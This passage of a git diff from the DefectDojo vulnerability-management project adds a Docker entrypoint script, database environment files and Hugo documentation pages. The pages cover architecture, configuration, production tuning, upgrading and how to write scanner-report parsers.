8025 + protocol: tcp + mode: host diff --git a/docker/entrypoint.sh b/docker/entrypoint.sh new file mode 100755 index 00000000000..acd1ff490ff --- /dev/null +++ b/docker/entrypoint.sh @@ -0,0 +1,53 @@ +#!/bin/sh + +# Waits for the database to come up. +./docker/wait-for-it.sh $DD_DATABASE_HOST:$DD_DATABASE_PORT + +if [ -z "$DD_DATABASE_URL" ]; then + if [ -z "$DD_DATABASE_PASSWORD" ]; then + echo "Please set DD_DATABASE_URL or other DD_DATABASE_HOST, DD_DATABASE_USER, DD_DATABASE_PASSWORD, ..." + exit 1 + fi + export DD_DATABASE_URL="$DD_DATABASE_TYPE://$DD_DATABASE_USER:$DD_DATABASE_PASSWORD@$DD_DATABASE_HOST:$DD_DATABASE_PORT/$DD_DATABASE_NAME" +fi + +if [ ! -f "/opt/django-DefectDojo/static/docker_complete" ]; then + python3 manage.py makemigrations dojo + python3 manage.py makemigrations --merge --noinput + python3 manage.py migrate + + if [ -z "$DD_ADMIN_PASSWORD" ]; then + DD_ADMIN_PASSWORD="admin" + fi + + # The '&&' is critical here. If the admin user is already created, setting the + # password will not be done. + python3 manage.py createsuperuser \ + --noinput \ + --username=admin \ + --email='admin@localhost' && \ + ./docker/setup-superuser.expect + + python3 manage.py loaddata initial_banner_conf + python3 manage.py loaddata product_type + python3 manage.py loaddata test_type + python3 manage.py loaddata development_environment + python3 manage.py loaddata system_settings + python3 manage.py loaddata benchmark_type + python3 manage.py loaddata benchmark_category + python3 manage.py loaddata benchmark_requirement + python3 manage.py loaddata language_type + python3 manage.py loaddata objects_review + python3 manage.py loaddata regulation + python3 manage.py installwatson + python3 manage.py buildwatson + python3 manage.py collectstatic --noinput + touch /opt/django-DefectDojo/static/docker_complete +fi + +gunicorn \ + --env DJANGO_SETTINGS_MODULE=dojo.settings.settings \ + dojo.wsgi:application \ + --bind 0.0.0.0:8000 \ + --workers 3 & +celery -A dojo worker -l info --concurrency 3 diff --git a/docker/environments/mysql-rabbitmq.env b/docker/environments/mysql-rabbitmq.env new file mode 100644 index 00000000000..5d166d0a197 --- /dev/null +++ b/docker/environments/mysql-rabbitmq.env @@ -0,0 +1,14 @@ +# MySQL character set is explicitly set to utf8mb4 +DD_DATABASE_URL=mysql://defectdojo:defectdojo@mysql:3306/defectdojo?charset=utf8mb4 +DD_DATABASE_ENGINE=django.db.backends.mysql +DD_DATABASE_HOST=mysql +DD_DATABASE_PORT=3306 + +DD_DATABASE_NAME=defectdojo +DD_DATABASE_USER=defectdojo +DD_DATABASE_PASSWORD=defectdojo + +DD_TEST_DATABASE_NAME=test_defectdojo +DD_TEST_DATABASE_URL=mysql://defectdojo:defectdojo@mysql:3306/test_defectdojo?charset=utf8mb4 + +DD_CELERY_BROKER_URL=amqp://guest:guest@rabbitmq:5672// diff --git a/docker/environments/mysql-redis.env b/docker/environments/mysql-redis.env new file mode 100644 index 00000000000..4ea8ab92edd --- /dev/null +++ b/docker/environments/mysql-redis.env @@ -0,0 +1,13 @@ +DD_DATABASE_URL=mysql://defectdojo:defectdojo@mysql:3306/defectdojo?charset=utf8mb4 +DD_DATABASE_ENGINE=django.db.backends.mysql +DD_DATABASE_HOST=mysql +DD_DATABASE_PORT=3306 + +DD_DATABASE_NAME=defectdojo +DD_DATABASE_USER=defectdojo +DD_DATABASE_PASSWORD=defectdojo + +DD_TEST_DATABASE_NAME=test_defectdojo +DD_TEST_DATABASE_URL=mysql://defectdojo:defectdojo@mysql:3306/test_defectdojo?charset=utf8mb4 + +DD_CELERY_BROKER_URL=redis://redis:6379/0 diff --git a/docker/environments/postgres-rabbitmq.env b/docker/environments/postgres-rabbitmq.env new file mode 100644 index 00000000000..77922a1e087 --- /dev/null +++ b/docker/environments/postgres-rabbitmq.env @@ -0,0 +1,13 @@ +DD_DATABASE_URL=postgresql://defectdojo:defectdojo@postgres:5432/defectdojo +DD_DATABASE_ENGINE=django.db.backends.postgresql +DD_DATABASE_HOST=postgres +DD_DATABASE_PORT=5432 + +DD_DATABASE_NAME=defectdojo +DD_DATABASE_USER=defectdojo +DD_DATABASE_PASSWORD=defectdojo + +DD_TEST_DATABASE_NAME=test_defectdojo +DD_TEST_DATABASE_URL=postgresql://defectdojo:defectdojo@postgres:5432/test_defectdojo + +DD_CELERY_BROKER_URL=amqp://guest:guest@rabbitmq:5672// diff --git a/docker/environments/postgres-redis.env b/docker/environments/postgres-redis.env new file mode 100644 index 00000000000..0fe157ea00d --- /dev/null +++ b/docker/environments/postgres-redis.env @@ -0,0 +1,13 @@ +DD_DATABASE_URL=postgresql://defectdojo:defectdojo@postgres:5432/defectdojo +DD_DATABASE_ENGINE=django.db.backends.postgresql +DD_DATABASE_HOST=postgres +DD_DATABASE_PORT=5432 + +DD_DATABASE_NAME=defectdojo +DD_DATABASE_USER=defectdojo +DD_DATABASE_PASSWORD=defectdojo + +DD_TEST_DATABASE_NAME=test_defectdojo +DD_TEST_DATABASE_URL=postgresql://defectdojo:defectdojo@postgres:5432/test_defectdojo + +DD_CELERY_BROKER_URL=redis://redis:6379/0 diff --git a/docker/unit-tests.sh b/docker/unit-tests.sh old mode 100644 new mode 100755 diff --git a/docs/assets/scss/_variables_project.scss b/docs/assets/scss/_variables_project.scss new file mode 100644 index 00000000000..774f63c80ad --- /dev/null +++ b/docs/assets/scss/_variables_project.scss @@ -0,0 +1,19 @@ +/* + +Add styles or override variables from the theme here. + +*/ + +$primary: #e7e7e7; +$secondary: #f8f8f8; + +$navbar-dark-color: #333 !default; +$navbar-dark-hover-color: #666 !default; + +.navbar-brand { + color: #333 !important +} + +.td-sidebar-link.tree-root { + color: #333 !important +} diff --git a/docs/content/en/contributing/_index.md b/docs/content/en/contributing/_index.md new file mode 100644 index 00000000000..5b87571cfcb --- /dev/null +++ b/docs/content/en/contributing/_index.md @@ -0,0 +1,8 @@ +--- +title: "Contributing" +description: "How you can help to make DefectDojo even better" +weight: 4 +chapter: true +--- + +You can find further information in the [contributing guidelines](https://github.com/DefectDojo/django-DefectDojo/blob/master/readme-docs/CONTRIBUTING.md). diff --git a/docs/content/en/contributing/branching-model.md b/docs/content/en/contributing/branching-model.md new file mode 100644 index 00000000000..3c1aa23ed32 --- /dev/null +++ b/docs/content/en/contributing/branching-model.md @@ -0,0 +1,29 @@ +--- +title: "Branching model" +description: "How to create releases" +draft: false +weight: 3 +--- + +## Regular releases + +The DefectDojo team aims to release at least once a month, on the first Tuesday. +Bugfix or security releases can come at any time. + +In doubt, GitHub Actions are the source of truth. The releases are semi-automated right now, with a DefectDojo maintainer proceeding with each major step in the release. The steps for a regular release are: +1. Create the release branch from `dev` and prepare a PR against `master` ([details](https://github.com/DefectDojo/django-DefectDojo/blob/master/.github/workflows/new-release-pr.yml)) +--> A maintainer verifies and manually merges the PR +2. Tag, issue draft release and docker build+push ([details](https://github.com/DefectDojo/django-DefectDojo/blob/master/.github/workflows/new-release-tag-docker.yml)) +--> A maintainer massages the release-drafter notes and publishes the release +3. A PR to merge `master` back to `dev` is created to re-align the branches ([details](https://github.com/DefectDojo/django-DefectDojo/blob/master/.github/workflows/new-release-master-into-dev.yml)) + +## Security releases +PRs that relate to security issues are done through [security advisories](https://github.com/DefectDojo/django-DefectDojo/security/advisories) which provide a way to work privately on code without prematurely disclosing vulnerabilities. + +## Release and hotfix model +![Schemas](../../images/branching_model.png) + +Diagrams created with [plantUML](https://plantuml.com). Find a web-based editor for PlantUML at https://www.planttext.com. + +## Documentation +A `dev` version of the documentation built from the `dev` branch is available at [DefectDojo Documentation - dev branch](https://defectdojo.github.io/django-DefectDojo/dev/). diff --git a/docs/content/en/contributing/documentation.md b/docs/content/en/contributing/documentation.md new file mode 100644 index 00000000000..faca05c54e9 --- /dev/null +++ b/docs/content/en/contributing/documentation.md @@ -0,0 +1,35 @@ +--- +title: "Documentation" +description: "How to amend the documentation" +draft: false +weight: 2 +--- + +The documentation is build with [Hugo](https://gohugo.io/) and uses the theme [Docsy](https://www.docsy.dev). The source code +of the documentation is located in the [docs](https://github.com/DefectDojo/django-DefectDojo/tree/dev/doc) folder. +Static files for the webside are build with github actions and are publish in the gh-pages branch. + +## How to run a local preview + +1. [Install Hugo](https://gohugo.io/getting-started/installing/). Make sure you have installed the extended version with Sass/SCSS support. Please note there are various Linux packages available on [Hugo GitHub](https://github.com/gohugoio/hugo/releases) + +2. Install JavaScript packages + + To build or update your site’s CSS resources, you also need PostCSS to create the final assets. If you need to install it, you must have a recent version of NodeJS installed on your machine so you can use npm, the Node package manager. By default npm installs tools under the directory where you run npm install: + + {{< highlight bash >}} + cd docs + npm install + {{< /highlight >}} + +3. Clone the DefectDojo git repository with the option `--recurse-submodules`. If you have already cloned the repository, make sure that you have checked out out the Docsy theme or use `git submodule` to check it out: + + {{< highlight bash >}} + cd docs/themes/docsy + git submodule update --init --recursive + {{< /highlight >}} + +4. Switch to the docs folder and start the hugo server with hot reloading `hugo server -D --config config.dev.toml` +5. Visit [http://localhost:1313/django-DefectDojo/dev](http://localhost:1313/django-DefectDojo/dev). + +See also the [Docsy installation procedures](https://www.docsy.dev/docs/getting-started/) for reference. diff --git a/docs/content/en/contributing/how-to-write-a-parser.md b/docs/content/en/contributing/how-to-write-a-parser.md new file mode 100644 index 00000000000..50a4ffa932c --- /dev/null +++ b/docs/content/en/contributing/how-to-write-a-parser.md @@ -0,0 +1,315 @@ +--- +title: "Parsers" +description: "How to contribute to parsers" +draft: false +weight: 1 +--- + +{{% alert title="Information" color="info" %}} +All commands assume that you're located at the root of the django-DefectDojo cloned repo. +{{% /alert %}} + +## Pre-requisites + +- You have forked https://github.com/DefectDojo/django-DefectDojo and cloned locally. +- Checkout `dev` and make sure you're up to date with the latest changes. +- It's advised that you create a dedicated branch for your development, such as `git checkout -b parser-name` yet that's up to you. + +It is probably easier to use the docker-compose stack (and benefit from the hot-reload capbility for uWSGI). +Set up your environment to use the debug environment, such as: + +`$ docker/setEnv.sh debug` + +Please have a look at [DOCKER.md](https://github.com/DefectDojo/django-DefectDojo/blob/master/readme-docs/DOCKER.md) for more details. + +### Docker images + +You'd want to build your docker images locally, and eventually pass in your local user's `uid` to be able to write to the image (handy for database migration files). Assuming your user's `uid` is `1000`, then: + +{{< highlight bash >}} +$ docker-compose build --build-arg uid=1000 +{{< /highlight >}} + +## Which files do you need to modify? + +| File | Purpose +|------- |-------- +|`dojo/tools//__init__.py` | Empty file for class initialization +|`dojo/tools//parser.py` | The meat. This is where you write your actual parser. The class name must be the Python module name without underscores plus `Parser`. **Example:** When the name of the Python module is `dependency_check`, the class name shall be `DependencyCheckParser` +|`unittests/scans//{many_vulns,no_vuln,one_vuln}.json` | Sample files containing meaningful data for unit tests. The minimal set. +|`unittests/tools/test__parser.py` | Unit tests of the parser. +|`dojo/settings/settings.dist.py` | If you want to use a modern hashcode based deduplication algorithm + +## Factory contract + +Parser are loaded dynamicaly with a factory pattern. To have your parser loaded and works correctly, you need to implement the contract. + +1. your parser **MUST** be in a sub-module of module `dojo.tools` + - ex: `dojo.tools.my_tool.parser` module +2. your parser **MUST** be a class in this sub-module. + - ex: `dojo.tools.my_tool.parser.MyToolParser` +3. The name of this class **MUST** be the Python module name without underscores and with `Parser` suffix. + - ex: `dojo.tools.my_tool.parser.MyToolParser` +4. This class **MUST** have an empty constructor or no constructor +5. This class **MUST** implement 3 methods: + 1. `def get_scan_types(self)` This function return a list of all the *scan_type* supported by your parser. This identifiers are used internally. Your parser can support more than one *scan_type*. For example some parsers use different identifier to modify the behavior of the parser (aggregate, filter, etc...) + 2. `def get_label_for_scan_types(self, scan_type):` This function return a string used to provide some text in the UI (short label) + 3. `def get_description_for_scan_types(self, scan_type):` This function return a string used to provide some text in the UI (long description) + 4. `def get_findings(self, file, test)` This function return a list of findings +6. If your parser have more than 1 scan_type (for detailled mode) you **MUST** implement `def set_mode(self, mode)` method + +Example: + +```Python + +class MyToolParser(object): + def get_scan_types(self): + return ["My Tool Scan", "My Tool Scan detailed"] + + def get_label_for_scan_types(self, scan_type): + if scan_type == "My Tool Scan": + return "My Tool XML Scan aggregated by ..." + else: + return "My Tool XML Scan" + + def get_description_for_scan_types(self, scan_type): + return "Aggregates findings per cwe, title, description, file_path. SonarQube output file can be imported in HTML format. Generate with https://github.com/soprasteria/sonar-report version >= 1.1.0" + + def requires_file(self, scan_type): + return False + + # mode: + # None (default): aggregates vulnerabilites per sink filename (legacy behavior) + # 'detailed' : No aggregation + mode = None + + def set_mode(self, mode): + self.mode = mode + + def get_findings(self, file, test): + <...> + +``` + +## Template Generator + +Use the [template](https://github.com/DefectDojo/cookiecutter-scanner-parser) parser to quickly generate the files required. To get started you will need to install [cookiecutter](https://github.com/cookiecutter/cookiecutter). + +{{< highlight bash >}} +$ pip install cookiecutter +{{< /highlight >}} + +Then generate your scanner parser from the root of django-DefectDojo: + +{{< highlight bash >}} +$ cookiecutter https://github.com/DefectDojo/cookiecutter-scanner-parser +{{< /highlight >}} + +Read [more](https://github.com/DefectDojo/cookiecutter-scanner-parser) on the template configuration variables. + +## Things to pay attention to + +Here is a list of advise that will make your parser future proof. + +### Do not parse URLs by hand + +We use 2 modules to handle endpoints: + - `hyperlink` + - `dojo.models` with a specific class to handle processing around URLs to create endpoints `Endpoint`. + +All the existing parser use the same code to parse URL and create endpoints. +Using `Endpoint.from_uri()` is the best way to create endpoints. +If you really need to parse an URL, use `hyperlink` module. + +Good example: + +```python + if "url" in item: + endpoint = Endpoint.from_uri(item["url"]) + finding.unsaved_endpoints = [endpoint] +``` + +Very bad example: + +```python + u = urlparse(item["url"]) + endpoint = Endpoint(host=u.host) + finding.unsaved_endpoints = [endpoint] +``` + +### Not all attributes are mandatory + +Parsers may have many fields, out of which many of them may be optional. +It better to not set attribute if you don't have data instead of filling with values like `NA`, `No data` etc... + +Check class `dojo.models.Finding` + +### Data could be missing in the source report + +Always make sure you include checks to avoid potential `KeyError` errors (e.g. field does not exist), for those fields you are not absolutely certain will always be in file that will get uploaded. These translate to 500 error, and do not look good. + +Good example: + +```python + if "mykey" in data: + finding.cve = data["mykey"] +``` + +### Do not parse CVSS by hand (vector, score or severity) + +Data can have `CVSS` vectors or scores. Don't try to write your own CVSS score algorithm. +For parser, we rely on module `cvss`. + +It's easy to use and will make the parser aligned with the rest of the code. + +Example of use: + +```python +from cvss.cvss3 import CVSS3 +import cvss.parser +vectors = cvss.parser.parse_cvss_from_text("CVSS:3.0/S:C/C:H/I:H/A:N/AV:P/AC:H/PR:H/UI:R/E:H/RL:O/RC:R/CR:H/IR:X/AR:X/MAC:H/MPR:X/MUI:X/MC:L/MA:X") +if len(vectors) > 0 and type(vectors[0]) == CVSS3: + print(vectors[0].severities()) # this is the 3 severities + + cvssv3 = vectors[0].clean_vector() + severity = vectors[0].severities()[0] + vectors[0].compute_base_score() + cvssv3_score = vectors[0].scores()[0] + print(severity) + print(cvssv3_score) +``` + +Good example: + +```python +vectors = cvss.parser.parse_cvss_from_text(item['cvss_vect']) +if len(vectors) > 0 and type(vectors[0]) == CVSS3: + finding.cvss = vectors[0].clean_vector() + finding.severity = vectors[0].severities()[0] # if your tool does generate severity +``` + +Bad example (DIY): + +```python + def get_severity(self, cvss, cvss_version="2.0"): + cvss = float(cvss) + cvss_version = float(cvss_version[:1]) + # If CVSS Version 3 and above + if cvss_version >= 3: + if cvss > 0 and cvss < 4: + return "Low" + elif cvss >= 4 and cvss < 7: + return "Medium" + elif cvss >= 7 and cvss < 9: + return "High" + elif cvss >= 9: + return "Critical" + else: + return "Informational" + # If CVSS Version prior to 3 + else: + if cvss > 0 and cvss < 4: + return "Low" + elif cvss >= 4 and cvss < 7: + return "Medium" + elif cvss >= 7 and cvss <= 10: + return "High" + else: + return "Informational" +``` + +## Deduplication algorithm + +By default a new parser uses the 'legacy' deduplication algorithm documented at https://defectdojo.github.io/django-DefectDojo/usage/features/#deduplication-algorithms + +## Unit tests + +Each parser must have unit tests, at least to test for 0 vuln, 1 vuln and many vulns. You can take a look at how other parsers have them for starters. The more quality tests, the better. + +It's important to add checks on attributes of findings. +For ex: + +```python + with self.subTest(i=0): + finding = findings[0] + self.assertEqual("test title", finding.title) + self.assertEqual(True, finding.active) + self.assertEqual(True, finding.verified) + self.assertEqual(False, finding.duplicate) + self.assertIn(finding.severity, Finding.SEVERITIES) + self.assertEqual("CVE-2020-36234", finding.cve) + self.assertEqual(261, finding.cwe) + self.assertEqual("CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", finding.cvssv3) + self.assertIn("security", finding.tags) + self.assertIn("network", finding.tags) + self.assertEqual("3287f2d0-554f-491b-8516-3c349ead8ee5", finding.unique_id_from_tool) + self.assertEqual("TEST1", finding.vuln_id_from_tool) +``` + +### Test database + +To test your unit tests locally, you first need to grant some rights. Get your MySQL root password from the docker-compose logs, login as root and issue the following commands: + +{{< highlight mysql >}} +MYSQL> grant all privileges on test_defectdojo.* to defectdojo@'%'; +MYSQL> flush privileges; +{{< /highlight >}} + +### Run your tests + +This local command will launch the unit test for your new parser + +{{< highlight bash >}} +$ docker-compose exec uwsgi bash -c 'python manage.py test unittests.tools.. -v2' +{{< /highlight >}} + +Example for the blackduck hub parser: + +{{< highlight bash >}} +$ docker-compose exec uwsgi bash -c 'python manage.py test unittests.tools.test_blackduck_csv_parser.TestBlackduckHubParser -v2' +{{< /highlight >}} + +{{% alert title="Information" color="info" %}} +If you want to run all unit tests, simply run `$ docker-compose exec uwsgi bash -c 'python manage.py test unittests -v2'` +{{% /alert %}} + +### Endpoint validation + +Some types of parsers create a list of endpoints that are vulnerable (they are stored in `finding.unsaved_endpoints`). DefectDojo requires storing endpoints in a specific format (which follow RFCs). Endpoints that do not follow this format can be stored but they will be marked as broken (red flag 🚩in UI). To be sure your parse store endpoints in the correct format run the `.clean()` function for all endpoints in unit tests + +```python +findings = parser.get_findings(testfile, Test()) +for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() +``` + +## Other files that could be involved + +### Change to the model + +In the event where you'd have to change the model, e.g. to increase a database column size to accomodate a longer string of data to be saved +* Change what you need in `dojo/models.py` +* Create a new migration file in dojo/db_migrations by running and including as part of your PR + + {{< highlight bash >}} + $ docker-compose exec uwsgi bash -c 'python manage.py makemigrations -v2' + {{< /highlight >}} + +### Accept a different type of file to upload + +If you want to be able to accept a new type of file for your parser, take a look at `dojo/forms.py` around line 436 (at the time of this writing) or locate the 2 places (for import and re-import) where you find the string `attrs={"accept":`. + +Formats currently accepted: .xml, .csv, .nessus, .json, .html, .js, .zip. + +### A need for more than just the parser.py + +Of course, nothing prevents you from having more files than the `parser.py` file. It's python :-) + +## Pull request examples + +If you want to take a look at previous parsers that are now part of DefectDojo, take a look at https://github.com/DefectDojo/django-DefectDojo/pulls?q=is%3Apr+sort%3Aupdated-desc+label%3A%22Import+Scans%22+is%3Aclosed + +## Update the import page documentation + +Please update [`docs/content/en/integrations/parsers.md`] with the details of your new parser. diff --git a/docs/content/en/contributing/wishlist.md b/docs/content/en/contributing/wishlist.md new file mode 100644 index 00000000000..6bbbd274112 --- /dev/null +++ b/docs/content/en/contributing/wishlist.md @@ -0,0 +1,13 @@ +--- +title: "Wishlist" +description: "Be careful what you wish for" +draft: false +weight: 2 +--- + +To manage expectations, we call this the wishlist. These are items we want to do, are discussing or pondering our minds: +- New modern UI / SPA +- New dashboarding / statistics +- New search engine +- Adopt a plugin framework to allow plugins for issue trackers, parsers, reports, etc +- More flexible model diff --git a/docs/content/en/getting_started/_index.md b/docs/content/en/getting_started/_index.md new file mode 100644 index 00000000000..b1f4cd88aa6 --- /dev/null +++ b/docs/content/en/getting_started/_index.md @@ -0,0 +1,6 @@ +--- +title: "Getting started" +description: "How to install and configure DefectDojo" +weight: 1 +chapter: true +--- diff --git a/docs/content/en/getting_started/architecture.md b/docs/content/en/getting_started/architecture.md new file mode 100644 index 00000000000..61632a1e9d0 --- /dev/null +++ b/docs/content/en/getting_started/architecture.md @@ -0,0 +1,47 @@ +--- +title: "Architecture" +description: "DefectDojo consists of several components that work together closely." +draft: false +weight: 1 +--- + +![Architecture](../../images/DD-Architecture.svg) + +## NGINX + +The webserver [NGINX](https://nginx.org/en/) delivers all static content, e.g. +images, JavaScript files or CSS files. + +## uWSGI + +[uWSGI](https://uwsgi-docs.readthedocs.io/en/latest/) is the application server +that runs the DefectDojo application, written in Python/Django, to serve all +dynamic content. + +## Message Broker + +The application server sends tasks to a [Message Broker](https://docs.celeryproject.org/en/stable/getting-started/brokers/index.html) +for asynchronous execution. [RabbitMQ](https://www.rabbitmq.com/) is a well supported choice. + +## Celery Worker + +Tasks like deduplication or the Jira synchonization are performed asynchronously +in the background by the [Celery](https://docs.celeryproject.org/en/stable/) +Worker. + +## Celery Beat + +In order to identify and notify users about things like upcoming engagements, +DefectDojo runs scheduled tasks. These tasks are scheduled and run using Celery +Beat. + +## Initializer + +The Initializer gets started during startup of DefectDojo to initialize the +database and run database migrations after upgrades of DefectDojo. It shuts +itself down after all tasks are performed. + +## Database + +The Database stores all data of DefectDojo. Currently [MySQL](https://dev.mysql.com/) +and [PostgreSQL](https://www.postgresql.org/) are supported. Please note the `django-watson` search engine require one or more MyISAM tables, so you cannot use Azure MySQL or Cloud SQL for MySQL. AWS RDS MySQL supports MyISAM tables, so it will work. diff --git a/docs/content/en/getting_started/configuration.md b/docs/content/en/getting_started/configuration.md new file mode 100644 index 00000000000..162a0b5a1cc --- /dev/null +++ b/docs/content/en/getting_started/configuration.md @@ -0,0 +1,38 @@ +--- +title: "Configuration" +description: "DefectDojo is highly configurable." +draft: false +weight: 3 +--- + +## dojo/settings/settings.dist.py + +The main settings are all stored in [`dojo/settings/settings.dist.py`](https://github.com/DefectDojo/django-DefectDojo/blob/master/dojo/settings/settings.dist.py). It is great to use this file as a reference what can be configured, but it shouldn't be edited directly, because changes would be overridden when updating DefectDojo. There are several methods to change the default settings: + +### Environment variables + +Most of these parameters can be set by environment variables. + +When you deploy DefectDojo via **Docker Compose**, you can set environment variables in [`docker-compose.yml`](https://github.com/DefectDojo/django-DefectDojo/blob/master/docker-compose.yml). Be aware you have to set the variables for three services: `uwsgi`, `celerybeat` and `celeryworker`. + +When you deploy DefectDojo in a **Kubernetes** cluster, you can set environment variables as `extraConfigs` and `extraSecrets` in [`helm/defectdojo/values.yaml`](https://github.com/DefectDojo/django-DefectDojo/blob/master/helm/defectdojo/values.yaml). + +### Environment file (not with Docker Compose or Kubernetes) + +`settings.dist.py` reads environment variables from a file whose name is specified in the environment variable `DD_ENV_PATH`. If this variable is not set, the default `.env.prod` is used. The file must be located in the `dojo/settings` directory. + +An example can be found in [`template_env`](https://github.com/DefectDojo/django-DefectDojo/blob/master/dojo/settings/template-env). + +### local_settings.py (not with Kubernetes) + +`local_settings.py` can contain more complex customizations such as adding MIDDLEWARE or INSTALLED_APP entries. +This file is processed *after* settings.dist.py is processed, so you can modify settings delivered by Defect Dojo out of the box. + The file must be located in the `dojo/settings` directory. Environment variables in this file must have no `DD_` prefix. + +An example can be found in [`dojo/settings/template-local_settings`](https://github.com/DefectDojo/django-DefectDojo/blob/master/dojo/settings/template-local_settings). + +In Docker Compose release mode, files in `docker/extra_settings/` (relative to the file `docker-compose.yml`) will be copied into `dojo/settings/` in the docker container on startup. + +## Configuration in the UI + +Users with the superuser status can configure more options via the UI under `Configuration` / `System Settings`. diff --git a/docs/content/en/getting_started/demo.md b/docs/content/en/getting_started/demo.md new file mode 100644 index 00000000000..a52ef8373a2 --- /dev/null +++ b/docs/content/en/getting_started/demo.md @@ -0,0 +1,12 @@ +--- +title: "Demo" +description: "There is Defect Dojo demo site running the latest official released version" +draft: false +weight: 6 +--- + +## Demo + +Try out the demo sever at [demo.defectdojo.org](https://demo.defectdojo.org) + +Log in with `admin / 1Defectdojo@demo#appsec`. Please note that the demo is publicly accessable and regularly reset. Do not put sensitive data in the demo. diff --git a/docs/content/en/getting_started/installation.md b/docs/content/en/getting_started/installation.md new file mode 100644 index 00000000000..bef08deba29 --- /dev/null +++ b/docs/content/en/getting_started/installation.md @@ -0,0 +1,35 @@ +--- +title: "Installation" +description: "DefectDojo supports various installation options." +draft: false +weight: 2 +--- + +## **Recommended Options** +--- + +### Docker Compose + +See instructions in [DOCKER.md]() + +### AWS AMI (Supports the Project) + +[Marketplace link](https://aws.amazon.com/marketplace/pp/prodview-m2a25gr67xbzk), and complete [walkthrough](https://www.10security.com/defectdojo-aws-launch-guide) + +--- +## **Options for the Brave** +--- +### Kubernetes + +See instructions in [KUBERNETES.md]() + +### Local install with godojo + +See instructions in [README.md]() +in the godojo repository + +--- + +## Customizing of settings + +See [Configuration](../configuration) diff --git a/docs/content/en/getting_started/running-in-production.md b/docs/content/en/getting_started/running-in-production.md new file mode 100644 index 00000000000..87ec2520f59 --- /dev/null +++ b/docs/content/en/getting_started/running-in-production.md @@ -0,0 +1,116 @@ +--- +title: "Running in production" +description: "Productive use of DefectDojo needs consideration of performance and backups." +draft: false +weight: 4 +--- + +## Production with docker-compose + +The docker-compose.yml file in this repository is fully functional to evaluate DefectDojo in your local environment. + +Although Docker Compose is one of the supported installation methods to deploy a containerized DefectDojo in a production environment, the docker-compose.yml file is not intended for production use without first customizing it to your particular situation. + +See [Running with Docker Compose](https://github.com/DefectDojo/django-DefectDojo/blob/master/readme-docs/DOCKER.md) for more information how to run DefectDojo with Docker Compose. + +### Database performance and backup + +It is recommended to use a dedicated database server and not the preconfigured MySQL database. This will improve the performance of DefectDojo + +In both case, if you use a dedicated database server or if you should decide to use the preconfigured MySQL database, make sure to make regular backups of the data. For a dedicated database server follow the instructions that come with the database server. For the preconfigured MySQL you can use mysqldump, e.g. as described in [How to backup a Docker MySQL database](https://dev.to/grant_bartlett/how-to-backup-a-docker-mysql-database-3nd8). + +### Backup of Media files + +Media files for uploaded files, including threat models and risk acceptance, are stored in a docker volume. This volume needs to be backed up regularly. + +### Instance size + +{{% alert title="Information" color="info" %}} +Please read the paragraphs below about key processes tweaks. +{{% /alert %}} + + +Having taken the database to run elsewhere, the minimum recommendation +is: + +- 2 vCPUs +- 8 GB of RAM +- 2 GB of disk space (remember, your database is not here \-- so + basically, what you have for your O/S should do). You could allocate + a different disk than your OS\'s for potential performance + improvements. + +### Key processes + +Per , it is +now easy to somewhat improve the uWSGI and celery worker performance. + +#### uWSGI + +By default (except in `ptvsd` mode for debug purposes), uWSGI will +handle 4 concurrent connections. + +Based on your resource settings, you can tweak: + +- `DD_UWSGI_NUM_OF_PROCESSES` for the number of spawned processes. + (default 2) +- `DD_UWSGI_NUM_OF_THREADS` for the number of threads in these + processes. (default 2) + +For example, you may have 4 processes with 6 threads each, yielding 24 +concurrent connections. + +#### Celery worker + +By default, a single mono-process celery worker is spawned. This is fine +until you start having many findings, and when async operations like +deduplication start to kick in. Eventually, it will starve your +resources and crawl to a halt, while operations continue to queue up. + +The following variables will help a lot, while keeping a single celery +worker container. + +- `DD_CELERY_WORKER_POOL_TYPE` will let you switch to `prefork`. + (default `solo`) + +As you\'ve enabled `prefork`, the following variables have +to be used. The default are working fairly well, see the +Dockerfile.django for in-file references. + +- `DD_CELERY_WORKER_AUTOSCALE_MIN` defaults to 2. +- `DD_CELERY_WORKER_AUTOSCALE_MAX` defaults to 8. +- `DD_CELERY_WORKER_CONCURRENCY` defaults to 8. +- `DD_CELERY_WORKER_PREFETCH_MULTIPLIER` defaults to 128. + +You can execute the following command to see the configuration: + +`docker-compose exec celerybeat bash -c "celery -A dojo inspect stats"` +and see what is in effect. + +###### Asynchronous Imports + +This is an experimental features that has some [concerns](https://github.com/DefectDojo/django-DefectDojo/pull/5553#issuecomment-989679555) that need to be addressed before it can be used reliably. + +Import and Re-Import can also be configured to handle uploads asynchronously to aid in +importing especially large files. It works by batching Findings and Endpoints by a +configurable amount. Each batch will be be processed in seperate celery tasks. + +The following variables have to be used. + +- `DD_ASYNC_FINDING_IMPORT` defaults to False +- `DD_ASYNC_FINDING_IMPORT_CHUNK_SIZE` deafults to 100 + +When using asynchronous imports with dynamic scanners, Endpoints will continue to "trickle" in +even after the import has returned a successful respsonse. This is becasue processing continues +to occur after the Findings have already been imported. + +To determine if an import has been fully completed, please see the progress bar in the appropriate test. + +## Monitoring + +To expose Django statistics for [Prometheus](https://prometheus.io/), set +`DJANGO_METRICS_ENABLED` to `True` in the settings +(see [Configuration](../configuration)). + +The Prometheus endpoint is than available under the path: +`http://dd_server/django_metrics/metrics` diff --git a/docs/content/en/getting_started/upgrading.md b/docs/content/en/getting_started/upgrading.md new file mode 100644 index 00000000000..2a48ddeab5e --- /dev/null +++ b/docs/content/en/getting_started/upgrading.md @@ -0,0 +1,739 @@ +--- +title: "Upgrading" +description: "Release specific upgrading instructions" +draft: false +weight: 5 +--- + +{{% alert title="Deprecation notice" color="warning" %}} +Legacy authorization for changing configurations based on staff users will be +removed with version 2.12.0 / 5. July 2022. If you have set +`FEATURE_CONFIGURATION_AUTHORIZATION` to `False` in your local configuration, +remove this local setting and start using the new authorization as described +in [Configuration permissions]({{< ref "/usage/permissions#configuration-permissions" >}}). + +To support the transition, you can run a migration script with ``./manage.py migrate_staff_users``. This script: + +* creates a group for all staff users, +* sets all configuration permissions that staff users had and +* sets the global Owner role, if `AUTHORIZATION_STAFF_OVERRIDE` is set to `True`. +{{% /alert %}} + +Docker-compose +-------------- + +When you deploy a vanilla docker-compose, it will create a persistent +volume for your MySQL database. As long as your volume is there, you +should not lose any data. + +### Using docker images provided in DockerHub + +{{% alert title="Information" color="info" %}} +If you\'re using `latest`, then you need to pre pull the `latest` from +DockerHub to update. +{{% /alert %}} + + +The generic upgrade method for docker-compose follows these steps: + +- Pull the latest version + + ``` {.sourceCode .bash} + docker pull 